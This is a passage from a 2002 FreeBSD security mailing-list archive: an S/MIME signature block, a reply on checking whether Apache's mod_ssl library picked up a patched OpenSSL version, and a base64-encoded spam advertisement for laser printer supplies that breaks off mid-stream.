AoAwggHpoAMCAQICAwZKljANBgkqhkiG9w0BAQIFADCBkjELMAkGA1UEBhMCWkExFTATBgNV BAgTDFdlc3Rlcm4gQ2FwZTESMBAGA1UEBxMJQ2FwZSBUb3duMQ8wDQYDVQQKEwZUaGF3dGUx HTAbBgNVBAsTFENlcnRpZmljYXRlIFNlcnZpY2VzMSgwJgYDVQQDEx9QZXJzb25hbCBGcmVl bWFpbCBSU0EgMjAwMC44LjMwMB4XDTAxMTIxMTEwMjkxMloXDTAyMTIxMTEwMjkxMlowRTEf MB0GA1UEAxMWVGhhd3RlIEZyZWVtYWlsIE1lbWJlcjEiMCAGCSqGSIb3DQEJARYTc2NvdHRA cm9lZGVyLm9yZy51azCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA4acHnm6Jq3XkDmEu iNxJoe8L1ckDdRhwjdjatnwjqKc8RzU/OvcFzJGUZRwBJ9Xe1rUpbdXJDiqfVIe6AIYJDKrv yHMR0YoR5wHkSnHEaiJG5yViLa92mOI0/uWSdGLFuJp2VgXIMmyPkBadwk+h0qHR5W64lYzO ZhXjX4m3qwUCAwEAAaMwMC4wHgYDVR0RBBcwFYETc2NvdHRAcm9lZGVyLm9yZy51azAMBgNV HRMBAf8EAjAAMA0GCSqGSIb3DQEBAgUAA4GBAJ7O0jY4R1FJktGztBqj7X/vj4PicE05A+ob JbVHnDTvkzzhUBk9Kennqt8BWYcEvNB6IWpvfhI885WJDye0hAn21G2GSBVjUBCZhgLcoaiY 9SerDGnR48YycJCNdsstcLgY78w1a4RyferJk3StjNEOV3R44U3KqWt33c75HMw1MIICgDCC AemgAwIBAgIDBkqWMA0GCSqGSIb3DQEBAgUAMIGSMQswCQYDVQQGEwJaQTEVMBMGA1UECBMM V2VzdGVybiBDYXBlMRIwEAYDVQQHEwlDYXBlIFRvd24xDzANBgNVBAoTBlRoYXd0ZTEdMBsG A1UECxMUQ2VydGlmaWNhdGUgU2VydmljZXMxKDAmBgNVBAMTH1BlcnNvbmFsIEZyZWVtYWls IFJTQSAyMDAwLjguMzAwHhcNMDExMjExMTAyOTEyWhcNMDIxMjExMTAyOTEyWjBFMR8wHQYD VQQDExZUaGF3dGUgRnJlZW1haWwgTWVtYmVyMSIwIAYJKoZIhvcNAQkBFhNzY290dEByb2Vk ZXIub3JnLnVrMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDhpweebomrdeQOYS6I3Emh 7wvVyQN1GHCN2Nq2fCOopzxHNT869wXMkZRlHAEn1d7WtSlt1ckOKp9Uh7oAhgkMqu/IcxHR ihHnAeRKccRqIkbnJWItr3aY4jT+5ZJ0YsW4mnZWBcgybI+QFp3CT6HSodHlbriVjM5mFeNf iberBQIDAQABozAwLjAeBgNVHREEFzAVgRNzY290dEByb2VkZXIub3JnLnVrMAwGA1UdEwEB /wQCMAAwDQYJKoZIhvcNAQECBQADgYEAns7SNjhHUUmS0bO0GqPtf++Pg+JwTTkD6hsltUec NO+TPOFQGT0p6eeq3wFZhwS80Hoham9+EjzzlYkPJ7SECfbUbYZIFWNQEJmGAtyhqJj1J6sM adHjxjJwkI12yy1wuBjvzDVrhHJ96smTdK2M0Q5XdHjhTcqpa3fdzvkczDUwggMpMIICkqAD AgECAgEMMA0GCSqGSIb3DQEBBAUAMIHRMQswCQYDVQQGEwJaQTEVMBMGA1UECBMMV2VzdGVy biBDYXBlMRIwEAYDVQQHEwlDYXBlIFRvd24xGjAYBgNVBAoTEVRoYXd0ZSBDb25zdWx0aW5n MSgwJgYDVQQLEx9DZXJ0aWZpY2F0aW9uIFNlcnZpY2VzIERpdmlzaW9uMSQwIgYDVQQDExtU aGF3dGUgUGVyc29uYWwgRnJlZW1haWwgQ0ExKzApBgkqhkiG9w0BCQEWHHBlcnNvbmFsLWZy ZWVtYWlsQHRoYXd0ZS5jb20wHhcNMDAwODMwMDAwMDAwWhcNMDIwODI5MjM1OTU5WjCBkjEL MAkGA1UEBhMCWkExFTATBgNVBAgTDFdlc3Rlcm4gQ2FwZTESMBAGA1UEBxMJQ2FwZSBUb3du MQ8wDQYDVQQKEwZUaGF3dGUxHTAbBgNVBAsTFENlcnRpZmljYXRlIFNlcnZpY2VzMSgwJgYD VQQDEx9QZXJzb25hbCBGcmVlbWFpbCBSU0EgMjAwMC44LjMwMIGfMA0GCSqGSIb3DQEBAQUA A4GNADCBiQKBgQDeMzKmY8cJJUU+0m54J2eBxdqIGYKXDuNEKYpjNSptcDz63K737nRvMLwz kH/5NHGgo22Y8cNPomXbDfpL8dbdYaX5hc1VmjUanZJ1qCeu2HL5ugL217CR3hzpq+AYA6h8 Q0JQUYeDPPA5tJtUihOH/7ObnUlmAC0JieyUa+mhaQIDAQABo04wTDApBgNVHREEIjAgpB4w HDEaMBgGA1UEAxMRUHJpdmF0ZUxhYmVsMS0yOTcwEgYDVR0TAQH/BAgwBgEB/wIBADALBgNV HQ8EBAMCAQYwDQYJKoZIhvcNAQEEBQADgYEAcxtvJmWL/xU0S1liiu1EvknH6A27j7kNaiYq YoQfuIdjdBxtt88aU5FL4c3mONntUPQ6bDSSrOaSnG7BIwHCCafvS65y3QZn9VBvLli4tgvB UFe17BzX7xe21Yibt6KIGu05Wzl9NPy2lhglTWr0ncXDkS+plrgFPFL83eliA0gxggKmMIIC ogIBATCBmjCBkjELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdlc3Rlcm4gQ2FwZTESMBAGA1UE BxMJQ2FwZSBUb3duMQ8wDQYDVQQKEwZUaGF3dGUxHTAbBgNVBAsTFENlcnRpZmljYXRlIFNl cnZpY2VzMSgwJgYDVQQDEx9QZXJzb25hbCBGcmVlbWFpbCBSU0EgMjAwMC44LjMwAgMGSpYw CQYFKw4DAhoFAKCCAWEwGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAcBgkqhkiG9w0BCQUx DxcNMDIwNzMxMDgyNTAxWjAjBgkqhkiG9w0BCQQxFgQUJjRoSBhk89IuCWm28WXW+l4B6CEw UgYJKoZIhvcNAQkPMUUwQzAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwDQYIKoZIhvcN AwICAUAwBwYFKw4DAgcwDQYIKoZIhvcNAwICASgwga0GCyqGSIb3DQEJEAILMYGdoIGaMIGS MQswCQYDVQQGEwJaQTEVMBMGA1UECBMMV2VzdGVybiBDYXBlMRIwEAYDVQQHEwlDYXBlIFRv d24xDzANBgNVBAoTBlRoYXd0ZTEdMBsGA1UECxMUQ2VydGlmaWNhdGUgU2VydmljZXMxKDAm BgNVBAMTH1BlcnNvbmFsIEZyZWVtYWlsIFJTQSAyMDAwLjguMzACAwZKljANBgkqhkiG9w0B AQEFAASBgG6OSb08uf4HugrIrRpTf4TZw6T0pLKaKXZ9PZuWpL1bqqRO94gWyTLqq+LokOrJ O0Tsw1I5BezrK3kIOquQa/MRH/miM1mNs2WC4cFksjMlhWAUHABNjDtpwI0YaRaXGWOQ5ylT +xCeXZ1NoVwfel+dLO0p/otA7W1HgC+Ex2+5AAAAAAAA --------------ms060105000607000906080602-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 1:57: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 54D7937B400 for ; Wed, 31 Jul 2002 01:57:01 -0700 (PDT) Received: from vmunix.dk (vmunix.dk [80.197.228.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6613A43E42 for ; Wed, 31 Jul 2002 01:57:00 -0700 (PDT) (envelope-from sst@fnyx.vmunix.dk) Received: from fnyx.vmunix.dk (localhost [IPv6:::1]) by vmunix.dk (8.12.5/8.12.5) with ESMTP id g6V8uv84034069; Wed, 31 Jul 2002 10:56:58 +0200 (CEST) (envelope-from sst@fnyx.vmunix.dk) Received: (from sst@localhost) by fnyx.vmunix.dk (8.12.5/8.12.5/Submit) id g6V8uv3D034068; Wed, 31 Jul 2002 10:56:57 +0200 (CEST) Date: Wed, 31 Jul 2002 10:56:57 +0200 From: Sune Stjerneby To: Mike Tancsa Cc: security@freebsd.org Subject: Re: apache mod_ssl ? Message-ID: <20020731085657.GA33775@fnyx.vmunix.dk> References: <5.1.0.14.0.20020730231635.040ee248@192.168.0.12> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <5.1.0.14.0.20020730231635.040ee248@192.168.0.12> Organization: Little if any. User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Mike Tancsa writes: >After a buildworld, do I need to worry about apache with mod_ssl ? Are >there parts that are statically compiled using openSSL ? I suspect so, % strings /usr/local/libexec/apache/libssl.so | egrep "0\.9\.6" OpenSSL 0.9.6a 5 Apr 2001 After a rebuild, it reads "OpenSSL 0.9.6e 30 Jul 2002" in apache/libssl.so. -- Sune Stjerneby % bloto flem rech rech kini To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 2:26:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 02CFD37B401; Wed, 31 Jul 2002 02:23:34 -0700 (PDT) Received: from yahoo.com (200-206-192-71.dsl.telesp.net.br [200.206.192.71]) by mx1.FreeBSD.org (Postfix) with SMTP id B63AF43E3B; Wed, 31 Jul 2002 02:23:23 -0700 (PDT) (envelope-from adc6kgRSp@usa.net) Received: from 166.189.142.157 ([166.189.142.157]) by da001d2020.lax-ca.osd.concentric.net with QMQP; Mon, 29 Jul 2002 17:35:37 -0000 Reply-To: Message-ID: <747EEC13-A42F-11D6-8C69-0040057025D8@PI3Pzv1k> From: To: , , , , , , , , , Subject: hi there Date: Wed, 31 Jul 2002 04:38:01 -0400 MiME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_00T7_69W80Z0A.A1111E22" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ------=_NextPart_000_00T7_69W80Z0A.A1111E22 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: base64 PCFkb2N0eXBlIGh0bWwgcHVibGljICItLy93M2MvL2R0ZCBodG1sIDQuMCB0cmFuc2l0aW9uYWwv L2VuIj4NCjxodG1sPg0KPGhlYWQ+DQogICA8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUi IGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4NCiAgIDxtZXRhIG5hbWU9 IkF1dGhvciIgY29udGVudD0ic2FtIj4NCiAgIDxtZXRhIG5hbWU9IkdFTkVSQVRPUiIgY29udGVu dD0iTW96aWxsYS80LjYxIFtlbl0gKFdpbjk4OyBJKSBbTmV0c2NhcGVdIj4NCiAgIDx0aXRsZT5m Z2ZnPC90aXRsZT4NCjwvaGVhZD4NCjxib2R5Pg0KJm5ic3A7DQo8dGFibGUgQk9SREVSIENPTFM9 MSBXSURUSD0iMTAwJSIgSEVJR0hUPSIxNSUiIEJHQ09MT1I9IiM0MDgwODAiID4NCjx0cj4NCjx0 ZCBCR0NPTE9SPSIjNDA4MDgwIj4NCjxjZW50ZXI+PGI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPjxm b250IHNpemU9KzM+VkVSVEVYIExBU0VSIEFORCZuYnNwOzwvZm9udD48L2ZvbnQ+PC9iPg0KPGJy PjxiPjxmb250IGNvbG9yPSIjRkZGRkZGIj48Zm9udCBzaXplPSszPkNPUElFUiBTVVBQTElFUzwv Zm9udD48L2ZvbnQ+PC9iPjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+DQo8L3RhYmxlPg0KDQo8YnI+ Jm5ic3A7DQo8Y2VudGVyPg0KPHA+PGZvbnQgY29sb3I9IiMwMDAwMDAiPjxmb250IHNpemU9KzI+ VEFLRSBBRFZBTlRBR0UgT0YgVEhFIFNBVklOR1MgV0hJTEUNClRIRVkgTEFTVCEhITwvZm9udD48 L2ZvbnQ+DQo8YnI+PGZvbnQgY29sb3I9IiMwMDAwMDAiPjxmb250IHNpemU9KzI+V0UgQVJFIFJF RFVDSU5HIE9VUiBJTlZFTlRPUlkgRk9SPC9mb250PjwvZm9udD4NCjxicj48Zm9udCBjb2xvcj0i IzAwMDAwMCI+PGZvbnQgc2l6ZT0rMj5USEUgU1VNTUVSIE9GIDIwMDIgT04gT1VSIExBU0VSPC9m b250PjwvZm9udD4NCjxicj48Zm9udCBjb2xvcj0iIzAwMDAwMCI+PGZvbnQgc2l6ZT0rMj5QUklO VEVSIEFORCBDT1BJRVIgU1VQUExJRVM8L2ZvbnQ+PC9mb250Pg0KPGJyPiZuYnNwOw0KPHA+PGZv bnQgY29sb3I9IiMwMDAwMDAiPjxmb250IHNpemU9KzI+Jm5ic3A7T1JERVIgQlkgUEhPTkU6IDEt ODg4LTI4OC05MDQzPC9mb250PjwvZm9udD4NCjxicj48Zm9udCBjb2xvcj0iIzAwMDAwMCI+PGZv bnQgc2l6ZT0rMj5PUkRFUiBCWSBGQVg6IDEtODg4LTk3Ny0xNTc3PC9mb250PjwvZm9udD4NCjxw PjxiPjxmb250IGNvbG9yPSIjMDAwMEEwIj48Zm9udCBzaXplPSsyPioqKkVNQUlMIFJFTU9WQUwg TElORTogMS04ODgtMjQ4LTQ5MzAqKio8L2ZvbnQ+PC9mb250PjwvYj4NCjxwPiZuYnNwO09SREVS IEJZIFBBR0UgTlVNQkVSIEFORC9PUiBJVEVNIE5VTUJFUg0KPGJyPiZuYnNwOw0KPGJyPiZuYnNw Ow0KPHA+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7PGZvbnQgZmFjZT0iQ29taWMgU2FucyBNUyI+ Jm5ic3A7IDwvZm9udD48dT48Zm9udCBmYWNlPSJBcmlhbCxIZWx2ZXRpY2EiPjxmb250IA0KY29s b3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzI+Rm9yDQpIZXdsZXR0IFBhY2thcmQgUHJpbnRlcnM6 PGk+IDwvaT4oUGFnZSAyKTwvZm9udD48L2ZvbnQ+PC9mb250PjwvdT48L2NlbnRlcj4NCg0KPHA+ PGJyPg0KPGNlbnRlcj48dGFibGUgQk9SREVSIFdJRFRIPSI4MCUiIEhFSUdIVD0iMTAlIiBCR0NP TE9SPSIjRkZGRkNDIiA+DQo8dHIgQkdDT0xPUj0iIzQwODA4MCI+DQo8dGQgQkdDT0xPUj0iIzQw ODA4MCI+DQo8Y2VudGVyPjxiPjxmb250IGNvbG9yPSIjRkZGRkZGIj48Zm9udCBzaXplPSsxPklU RU08L2ZvbnQ+PC9mb250PjwvYj48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZCBCR0NPTE9SPSIjNDA4 MDgwIj4NCjxjZW50ZXI+PGZvbnQgc2l6ZT0rMT4mbmJzcDs8Yj48Zm9udCBjb2xvcj0iI0ZGRkZG RiI+REVTQ1JJUFRJT048L2ZvbnQ+PC9iPjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4N CjxjZW50ZXI+PGI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9KzE+TUZHICM8L2Zv bnQ+PC9mb250PjwvYj48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGI+PGZvbnQg Y29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9KzE+UFJJQ0U8L2ZvbnQ+PC9mb250PjwvYj48L2Nl bnRlcj4NCjwvdGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQgQkdDT0xPUj0iI0ZGRkZDQyI+DQo8Y2Vu dGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkl0ZW0gIzE8L2ZvbnQ+PC9m b250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5 OSI+PGZvbnQgc2l6ZT0rMT5MYXNlcmpldCBTZXJpZXMgNEwsIDRQJm5ic3A7PC9mb250PjwvZm9u dD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTki Pjxmb250IHNpemU9KzE+Jm5ic3A7OTIyNzRBPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+ DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDQ0 PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQgQkdDT0xP Uj0iI0ZGRkZDQyI+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsx Pkl0ZW0gIzI8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5MYXNlcmpldCBTZXJpZXMgMTEwMCwz MjAwPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQg Y29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+Jm5ic3A7QzQwOTI8L2ZvbnQ+PC9mb250Pjwv Y2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZv bnQgc2l6ZT0rMT4mbmJzcDskNDQ8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+ DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9 KzE+SXRlbSAjMzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwO0xhc2VyamV0IFNlcmll cyZuYnNwOw0KMjwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwOyA5MjI5NUE8L2ZvbnQ+ PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAw MDA5OSI+PGZvbnQgc2l6ZT0rMT4mbmJzcDsgJDQ5PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48 Zm9udCBzaXplPSsxPiZuYnNwO0l0ZW0gIyA0PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+ DQoNCjx0ZCBXSURUSD0iNzAlIj4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250 IHNpemU9KzE+Jm5ic3A7TGFzZXJqZXQgU2VyaWVzJm5ic3A7DQoyUDwvZm9udD48L2ZvbnQ+PC9j ZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9u dCBzaXplPSsxPiZuYnNwOzkyMjc1QTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8 dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwOyAk NTQ8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxj ZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+Jm5ic3A7SXRlbSAjNTwv Zm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9y PSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwO0xhc2VyamV0IFNlcmllcyA1UCw2UCwNCjVN UCwgNk1QPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZv bnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+Jm5ic3A7MzYwM0E8L2ZvbnQ+PC9mb250 PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+ PGZvbnQgc2l6ZT0rMT4mbmJzcDskNDQ8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwv dHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNp emU9KzE+SXRlbSAjNjwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2Vu dGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwO0xhc2VyamV0IFNl cmllcyA1U0ksODAwMDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2Vu dGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwOzM5MDlBPC9mb250 PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMw MDAwOTkiPjxmb250IHNpemU9KzE+JDk1PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8 L3RyPg0KDQo8dHI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBz aXplPSsxPiZuYnNwO0l0ZW0gIzcmbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4N Cg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4mbmJz cDtMYXNlcmpldCBTZXJpZXMgMjEwMCwNCjIyMDAmbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVy Pg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT4mbmJzcDtDNDA5NjwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8 Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwOyQ3NDwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4mbmJzcDtJdGVtICM4PC9mb250Pjwv Zm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAw OTkiPjxmb250IHNpemU9KzE+Jm5ic3A7TGFzZXJqZXQgU2VyaWVzIDgxMDA8L2ZvbnQ+PC9mb250 PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+ PGZvbnQgc2l6ZT0rMT4mbmJzcDtDNDE4MjwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0K DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNw OyQxMTU8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4N CjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+Jm5ic3A7SXRlbSAj OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNv bG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxhc2VyamV0IFNlcmllcyA1TC82TDwvZm9udD48 L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAw MDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwOzM5MDZBPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+ Jm5ic3A7JDM5PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8L3RyPg0KDQo8dHI+DQo8 dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwO0l0 ZW0gIzEwJm5ic3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50 ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+TGFzZXJqZXQgU2VyaWVzJm5i c3A7IDRWPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZv bnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+QzM5MDAmbmJzcDs8L2ZvbnQ+PC9mb250 PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+ PGZvbnQgc2l6ZT0rMT4mbmJzcDskOTU8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwv dHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNp emU9KzE+Jm5ic3A7SXRlbSAjMTE8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRk Pg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5MYXNlcmpldCBT ZXJpZXMgNDAwMDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkM0MTI3WDwvZm9udD48L2ZvbnQ+ PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48 Zm9udCBzaXplPSsxPiZuYnNwOyQ3OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90 cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT4mbmJzcDtJdGVtICMxMjwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+ DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxhc2VyamV0IFNl cmllcyAzU0kvNFNJPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50 ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+Jm5ic3A7OTIyOTFBJm5ic3A7 PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29s b3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDU0PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48 Zm9udCBzaXplPSsxPiZuYnNwO0l0ZW0gIzEzPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+ DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+TGFz ZXJqZXQgU2VyaWVzIDQsNE0sNSw1TSZuYnNwOzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3Rk Pg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPjky 